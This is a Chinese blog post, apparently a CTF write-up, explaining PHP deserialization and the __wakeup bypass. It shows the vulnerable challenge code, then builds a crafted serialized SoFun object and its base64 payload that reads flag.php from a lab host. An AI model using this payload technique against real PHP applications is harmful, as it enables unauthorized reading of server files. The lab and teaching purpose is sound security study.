<!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>php反序列化漏洞 | Ambb1&#39;Blog</title>
  <meta name="author" content="D">

  
  <meta name="description" content="声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负">
  

  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="php反序列化漏洞">
  <meta property="og:site_name" content="Ambb1&#39;Blog">

  <meta name="google-site-verification" content="IYRjS_ZQ5oWdxEbMPb6RbJtjrWLrWaHwQItM7zyq8fc">
  

  
    <meta property="og:image" content>
  

  
  <link href="/css/images/favicon.ico" rel="icon">
  

  <link rel="alternate" href="/atom.xml" title="Ambb1&#39;Blog" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
  


  <!-- baidu webmaster push -->
  <script src="//push.zhanzhang.baidu.com/push.js"></script>

</head>
</html>

<body>
  <header id="header" class="inner"><div class="alignleft">
  <h1><a href="/">Ambb1&#39;Blog</a></h1>
  <h2><a href="/"></a></h2>
</div>
<nav id="main-nav" class="alignright">
  <ul>
    
      <li><a href="/">Home</a></li>
    
      <li><a href="/archives">Archives</a></li>
    
      <li><a href="/1995/09/15/导航/">导航</a></li>
    
      <li><a href="https://xz.aliyun.com/u/14095">先知社区</a></li>
    
      <li><a href="https://study.163.com/instructor/1022621647.htm?_trace_c_p_k2_=5639bc1aaace45be83f70ec7b227ccdf">网易云课堂</a></li>
    
      <li><a href="https://space.bilibili.com/95249482">B站</a></li>
    
      <li><a href="https://qm.qq.com/cgi-bin/qm/qr?k=s-TbazDtthvriuYsd3WK-Wt1xK-mYyXX&authKey=u7NGkNkFpAVS4Wfuc5QKCdUxPL4on%2FwmD85DzmVqWw2DO4EWhoFMdB6Gf2TQWTWs">QQ群</a></li>
    
  </ul>
  <div class="clearfix"></div>
</nav>
<div class="clearfix"></div></header>
  <div id="content" class="inner">
    <div id="main-col" class="alignleft"><div id="wrapper"><article class="post">
  
  <div class="post-content">
    <header>
      
        <div class="icon"></div>
        <time datetime="2019-04-20T16:00:00.000Z"><a href="/2019/04/21/php反序列化漏洞/">2019-04-21</a></time>
      
      
  
    <h1 class="title">php反序列化漏洞</h1>
  

    </header>
    <div class="entry">
      
        <html><body style="padding: 20px;"><marquee><span style="font-weight: bolder;font-size: 20px;color: red;"><a href="https://www.youtube.com/channel/UCiO_qNDegcpV4cUhkFc22lA?view_as=subscriber" target="_blank" rel="noopener"><font color="red">声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负</font></a></span></marquee></body></html>



<a id="more"></a>

<h1 id="一，准备环境"><a href="#一，准备环境" class="headerlink" title="一，准备环境"></a>一，准备环境</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull duwentao/phpfanxuliehua:1.0</span><br></pre></td></tr></table></figure>

<h1 id="二，playload"><a href="#二，playload" class="headerlink" title="二，playload"></a>二，playload</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://172.24.10.137:8989/?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==</span><br></pre></td></tr></table></figure>

<p><img src="/../images/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20190421185420249.png" alt="image-20190421185420249"></p>
<h1 id="三，原理分析"><a href="#三，原理分析" class="headerlink" title="三，原理分析"></a>三，原理分析</h1><h2 id="1，代码"><a href="#1，代码" class="headerlink" title="1，代码"></a>1，代码</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">  error_reporting(<span class="number">0</span>); </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">SoFun</span></span>&#123; </span><br><span class="line">        <span class="keyword">protected</span> $file=<span class="string">'index.php'</span>; </span><br><span class="line">         </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($file)</span></span>&#123; </span><br><span class="line">            <span class="keyword">$this</span>-&gt;file=$file; </span><br><span class="line">        &#125; </span><br><span class="line">         </span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123; </span><br><span class="line">            <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;file))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(strchr(<span class="keyword">$this</span>-&gt;file,<span class="string">"\\"</span>)===<span class="keyword">false</span> &amp;&amp; strchr(<span class="keyword">$this</span>-&gt;file,<span class="string">'/'</span>)===<span class="keyword">false</span>)</span><br><span class="line">                    show_source(dirname(<span class="keyword">__FILE__</span>).<span class="string">'/'</span>.<span class="keyword">$this</span>-&gt;file);</span><br><span class="line">                <span class="keyword">else</span></span><br><span class="line">                    <span class="keyword">die</span>(<span class="string">'Wrong filename.'</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; </span><br><span class="line">         </span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123; </span><br><span class="line">            <span class="keyword">$this</span>-&gt;file=<span class="string">'index.php'</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">''</span>;</span><br><span class="line">        &#125;</span><br><span class="line"> 		&#125;</span><br><span class="line">      </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($_GET[<span class="string">'file'</span>]))&#123; </span><br><span class="line">        show_source(<span class="string">'index.php'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span>&#123; </span><br><span class="line">        $file=base64_decode($_GET[<span class="string">'file'</span>]); </span><br><span class="line">        <span class="keyword">echo</span> unserialize($file); </span><br><span class="line">        &#125; </span><br><span class="line"><span class="meta">?&gt;</span> </span><br><span class="line">&lt;!--key in flag.php--&gt;</span><br></pre></td></tr></table></figure>

<h2 id="2，分析"><a href="#2，分析" class="headerlink" title="2，分析"></a>2，分析</h2><p>审计代码，可以发现要得到KEY，思路如下：<br>1、源码最后提示，KEY在flag.php里面； </p>
<p>2、注意到__destruct魔术方法中，有这么一段代码，将file文件内容显示出来show_source(dirname(FILE).’/‘.$this-&gt;file)，这个是解题关键； __</p>
<p>3、若POST“file”参数为序列化对象，且将file设为flag.php；那么可以通过unserialize反序列化，进而调用__destruct魔术方法来显示flag.php源码（要注意的是file参数内容需要经过base64编码）； __</p>
<p>4、上面的分析是多么美好，但从代码分析可以知道，还有<strong>wakeup这个拦路虎，通过unserialize反序列化之后，也会调用</strong>wakeup方法，它会把file设为index.php； </p>
<p>5、总结下来就是，想办法把file设为flag.php，调用<strong>destruct方法，且绕过</strong>wakeup。</p>
<h2 id="3，绕过思路"><a href="#3，绕过思路" class="headerlink" title="3，绕过思路"></a>3，绕过思路</h2><p>当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行<strong>。</strong></p>
<p>举个栗子，比如有个Student类，里面有个参数为name。<br>实际情况：O:7:”Student”:<strong>1</strong>:{S:4:”name”;s:8:”zhangsan”;}<br>Payload：O:7:”Student”:<strong>2</strong>:{S:4:”name”;s:8:”zhangsan”;}</p>
<p>Payload对象属性个数为2，而实际属性个数为1，那么就会掉入漏洞，从而跳过wakeup()方法。</p>
<h2 id="4，构造payload"><a href="#4，构造payload" class="headerlink" title="4，构造payload"></a>4，构造payload</h2><p>明确了这些之后，就可以构造出Payload了，需反序列化的对象为：</p>
<p>O:5:”SoFun”:2:{S:7:”\00*\00file”;s:8:”flag.php”;}</p>
<p>O:5:”SoFun” 指的是 类：5个字符：SoFun</p>
<p>:2:  指的是 有两个对象</p>
<p>S:7:”\00*\00file”   指的是有个属性，有7个字符，名为\00*\00file</p>
<p>注意:  这里的S要大写 <a href="http://www.neatstudio.com/show-161-1.shtml" target="_blank" rel="noopener">PHP 序列化（serialize）格式详解</a></p>
<p>s:8:”flag.php”   指的是属性值，有8个字符，值为flag.php</p>
<p>值得注意的是，<font color="red"> file是protected属性，因此需要用\00*\00来表示，\00代表ascii为0的值</font>。</p>
<p>另外，还需要经过Base64编码，结果为：<br>Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==</p>
<p><img src="/../images/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/image-20190421185420249.png" alt="image-20190421185420249"></p>
<h1 id="四，补充"><a href="#四，补充" class="headerlink" title="四，补充"></a>四，补充</h1><p> __construct 是构造函数在创建对象的时候调用</p>
<p> __destruct() 是析构函数在程序结束时调用</p>
<p>__wakeup()函数：</p>
<p>__wakeup()函数是用在反序列化操作中，unserialize()会去检查这个函数，如果存在，则调用这个函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'Hello'</span>;</span><br><span class="line">    &#125; </span><br><span class="line">	&#125;</span><br><span class="line">$c = <span class="keyword">new</span> A();</span><br><span class="line">$d = serialize($c);</span><br><span class="line">$e=unserialize($d);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出hello</p>
<p>__wakeup漏洞代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Student</span></span>&#123; </span><br><span class="line"><span class="keyword">public</span> $full_name = <span class="string">'zhangsan'</span>;</span><br><span class="line"><span class="keyword">public</span> $score = <span class="number">150</span>;</span><br><span class="line"><span class="keyword">public</span> $grades = <span class="keyword">array</span>();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span> </span>&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"__wakeup is invoked"</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$s = <span class="keyword">new</span> Student();</span><br><span class="line">var_dump(serialize($s));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>最后页面上输出的就是Student对象的一个序列化输出，<br>O:7:”Student”:<font color="red"> 3</font>:{s:9:”full_name”;s:8:”zhangsan”;s:5:”score”;i:150;s:6:”grades”;a:0:{}}。</p>
<p>其中在Stuedent类后面有一个数字<font color="red"> 3</font>，整个3表示的就是Student类存在3个属性。</p>
<p>__wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。</p>
<p>当我们将上述的序列化的字符串中的对象属性修改为<font color="red"> 5</font>，变为<br>O:7:”Student”:<font color="red"> 5</font>:{s:9:”full_name”;s:8:”zhangsan”;s:5:”score”;i:150;s:6:”grades”;a:0:{}}。<br>最后执行运行的代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Student</span></span>&#123; </span><br><span class="line"><span class="keyword">public</span> $full_name = <span class="string">'zhangsan'</span>;</span><br><span class="line"><span class="keyword">public</span> $score = <span class="number">150</span>;</span><br><span class="line"><span class="keyword">public</span> $grades = <span class="keyword">array</span>();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span> </span>&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"__wakeup is invoked"</span>;</span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">var_dump(<span class="keyword">$this</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$s = <span class="keyword">new</span> Student();</span><br><span class="line">$stu = unserialize(<span class="string">'O:7:"Student":5:&#123;s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:&#123;&#125;&#125;'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="五，说明"><a href="#五，说明" class="headerlink" title="五，说明"></a>五，说明</h1><p>说明:代码来源于网络，都经过本人验证</p>
<h1 id="六，视频演示"><a href="#六，视频演示" class="headerlink" title="六，视频演示"></a>六，视频演示</h1><iframe width="560" height="315" src="https://www.youtube.com/embed/Lh5jPB7Vlyg" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>


      
    </div>
    
    <footer>
        <div class="alignright">
          
          <a href="javascript:void(0)" class="share-link bdsharebuttonbox" data-cmd="more">分享</a>
        </div>
        
        
  
  <div class="tags">
    <a href="/tags/ctf/">ctf</a>, <a href="/tags/php反序列化漏洞/">php反序列化漏洞</a>
  </div>

        <!-- partial('post/share') -->
      <div class="clearfix"></div>
    </footer>
  </div>
</article>



</div></div>
    <aside id="sidebar" class="alignright">
  <div class="search">
  <form action="//google.com/search" method="get" accept-charset="utf-8">
    <input type="search" name="q" results="0" placeholder="Search">
    <input type="hidden" name="q" value="site:www.ambb1.top">
  </form>
</div>

  

  
<div class="widget tag">
  <h3 class="title">Recent Posts</h3>
  <ul class="entry">
    
      <li>
        <a href="/2019/08/20/二进制学习笔记之裸函数/">二进制学习笔记二之裸函数</a>
      </li>
    
      <li>
        <a href="/2019/08/14/二进制学习工具问题集/">二进制学习工具问题集</a>
      </li>
    
      <li>
        <a href="/2019/05/29/pwn学习01/">01,pwn学习系列</a>
      </li>
    
      <li>
        <a href="/2019/05/13/xxe总结/">xxe总结</a>
      </li>
    
      <li>
        <a href="/2019/05/09/PHP变量覆盖漏洞总结/">PHP变量覆盖总结</a>
      </li>
    
  </ul>
</div>


  
<div class="widget tag">
  <h3 class="title">Tags</h3>
  <ul class="entry">
  
    <li><a href="/tags/二进制学习-裸函数/">-二进制学习 -裸函数</a><small>1</small></li>
  
    <li><a href="/tags/CTF/">CTF</a><small>2</small></li>
  
    <li><a href="/tags/access/">access</a><small>1</small></li>
  
    <li><a href="/tags/c/">c++</a><small>4</small></li>
  
    <li><a href="/tags/ctf/">ctf</a><small>2</small></li>
  
    <li><a href="/tags/mysql/">mysql</a><small>6</small></li>
  
    <li><a href="/tags/node-js/">node.js</a><small>1</small></li>
  
    <li><a href="/tags/php/">php</a><small>2</small></li>
  
    <li><a href="/tags/php反序列化漏洞/">php反序列化漏洞</a><small>1</small></li>
  
    <li><a href="/tags/pwn/">pwn</a><small>1</small></li>
  
    <li><a href="/tags/python/">python</a><small>1</small></li>
  
    <li><a href="/tags/sql注入/">sql注入</a><small>7</small></li>
  
    <li><a href="/tags/ssh/">ssh</a><small>1</small></li>
  
    <li><a href="/tags/ssrf/">ssrf</a><small>1</small></li>
  
    <li><a href="/tags/vps/">vps</a><small>1</small></li>
  
    <li><a href="/tags/web-靶机/">web-靶机</a><small>2</small></li>
  
    <li><a href="/tags/web-sql-injection/">web_sql_injection</a><small>1</small></li>
  
    <li><a href="/tags/web-upload-include/">web_upload_include</a><small>1</small></li>
  
    <li><a href="/tags/web安全/">web安全</a><small>9</small></li>
  
    <li><a href="/tags/web漏洞/">web漏洞</a><small>1</small></li>
  
    <li><a href="/tags/xxe/">xxe</a><small>1</small></li>
  
    <li><a href="/tags/二进制安全/">二进制安全</a><small>1</small></li>
  
    <li><a href="/tags/关于我/">关于我</a><small>2</small></li>
  
    <li><a href="/tags/内网渗透/">内网渗透</a><small>1</small></li>
  
    <li><a href="/tags/博客/">博客</a><small>1</small></li>
  
    <li><a href="/tags/变量覆盖/">变量覆盖</a><small>1</small></li>
  
    <li><a href="/tags/导航/">导航</a><small>1</small></li>
  
    <li><a href="/tags/支付漏洞/">支付漏洞</a><small>1</small></li>
  
    <li><a href="/tags/数据结构/">数据结构</a><small>2</small></li>
  
    <li><a href="/tags/文件上传/">文件上传</a><small>1</small></li>
  
    <li><a href="/tags/文件包含漏洞/">文件包含漏洞</a><small>1</small></li>
  
    <li><a href="/tags/栈/">栈</a><small>1</small></li>
  
    <li><a href="/tags/私有云/">私有云</a><small>1</small></li>
  
    <li><a href="/tags/竞赛/">竞赛</a><small>1</small></li>
  
    <li><a href="/tags/脚本/">脚本</a><small>1</small></li>
  
    <li><a href="/tags/自考/">自考</a><small>4</small></li>
  
    <li><a href="/tags/逻辑漏洞/">逻辑漏洞</a><small>1</small></li>
  
    <li><a href="/tags/队列/">队列</a><small>1</small></li>
  
    <li><a href="/tags/靶机/">靶机</a><small>1</small></li>
  
    <li><a href="/tags/靶机渗透/">靶机渗透</a><small>2</small></li>
  
  </ul>
</div>


  
<div class="widget tagcloud">
  <h3 class="title">Tag Cloud</h3>
  <div class="entry">
    <a href="/tags/二进制学习-裸函数/" style="font-size: 10px;">-二进制学习 -裸函数</a> <a href="/tags/CTF/" style="font-size: 12px;">CTF</a> <a href="/tags/access/" style="font-size: 10px;">access</a> <a href="/tags/c/" style="font-size: 14px;">c++</a> <a href="/tags/ctf/" style="font-size: 12px;">ctf</a> <a href="/tags/mysql/" style="font-size: 16px;">mysql</a> <a href="/tags/node-js/" style="font-size: 10px;">node.js</a> <a href="/tags/php/" style="font-size: 12px;">php</a> <a href="/tags/php反序列化漏洞/" style="font-size: 10px;">php反序列化漏洞</a> <a href="/tags/pwn/" style="font-size: 10px;">pwn</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/sql注入/" style="font-size: 18px;">sql注入</a> <a href="/tags/ssh/" style="font-size: 10px;">ssh</a> <a href="/tags/ssrf/" style="font-size: 10px;">ssrf</a> <a href="/tags/vps/" style="font-size: 10px;">vps</a> <a href="/tags/web-靶机/" style="font-size: 12px;">web-靶机</a> <a href="/tags/web-sql-injection/" style="font-size: 10px;">web_sql_injection</a> <a href="/tags/web-upload-include/" style="font-size: 10px;">web_upload_include</a> <a href="/tags/web安全/" style="font-size: 20px;">web安全</a> <a href="/tags/web漏洞/" style="font-size: 10px;">web漏洞</a> <a href="/tags/xxe/" style="font-size: 10px;">xxe</a> <a href="/tags/二进制安全/" style="font-size: 10px;">二进制安全</a> <a href="/tags/关于我/" style="font-size: 12px;">关于我</a> <a href="/tags/内网渗透/" style="font-size: 10px;">内网渗透</a> <a href="/tags/博客/" style="font-size: 10px;">博客</a> <a href="/tags/变量覆盖/" style="font-size: 10px;">变量覆盖</a> <a href="/tags/导航/" style="font-size: 10px;">导航</a> <a href="/tags/支付漏洞/" style="font-size: 10px;">支付漏洞</a> <a href="/tags/数据结构/" style="font-size: 12px;">数据结构</a> <a href="/tags/文件上传/" style="font-size: 10px;">文件上传</a> <a href="/tags/文件包含漏洞/" style="font-size: 10px;">文件包含漏洞</a> <a href="/tags/栈/" style="font-size: 10px;">栈</a> <a href="/tags/私有云/" style="font-size: 10px;">私有云</a> <a href="/tags/竞赛/" style="font-size: 10px;">竞赛</a> <a href="/tags/脚本/" style="font-size: 10px;">脚本</a> <a href="/tags/自考/" style="font-size: 14px;">自考</a> <a href="/tags/逻辑漏洞/" style="font-size: 10px;">逻辑漏洞</a> <a href="/tags/队列/" style="font-size: 10px;">队列</a> <a href="/tags/靶机/" style="font-size: 10px;">靶机</a> <a href="/tags/靶机渗透/" style="font-size: 12px;">靶机渗透</a>
  </div>
</div>

</aside>
    <div class="clearfix"></div>
  </div>
  <footer id="footer" class="inner"><div class="alignleft">
  <p>
  
  &copy; 2019 D
  
  All rights reserved.</p>
  <p>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></p>
</div>
<div class="clearfix"></div>

<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script></footer>
  <script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>


<div id="bg"></div>
</body>
</html>